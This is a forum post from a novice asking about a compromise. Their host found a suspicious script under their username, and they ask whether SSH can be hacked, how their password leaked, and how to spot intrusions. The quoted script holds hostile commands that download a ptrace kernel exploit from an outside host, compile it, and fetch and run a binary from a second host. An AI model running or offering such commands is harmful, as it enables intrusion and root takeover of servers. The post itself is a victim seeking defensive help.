Can SSH Be Hacked -- and other newbie questions
Disclaimer: I'm a novice to web security so please bear with me...!
Recently my host found a suspect script in their /tmp directory and said my username was attached:
Code:
cd /var/tmp
cat /etc/issue
cat /etc/*rel*
wget http://sinuspl.net/ptrace/isec-ptrace-kmod-exploit.c
mv isec-ptrace-kmod-exploit.c ini.c
gcc ini.c -o ini
dc /var/tmp
wget www.icerslair.com/n
ls -al
cd /var/tmp
wget www.icerslair.com/n
chmod 755 n
./n
1) Can SSH be hacked in this manner? Wouldn't it mean that the hacker also would have my root password?
2) How would it be possible for the person to get this, since I've never written it down anywhere?
3) If a directory is chmoded to 770, does that mean that still *anyone* can write to it, putting files in there, etc...? And if so, how can this be prevented?
4) How would I be able to tell if someone is writing scripts to my directory like this? Looking at my server logs is fun, but I don't know necessarily what I'm looking for.
I'm sure I'll think of more questions...! But answers to any of the above would greatly be appreciated.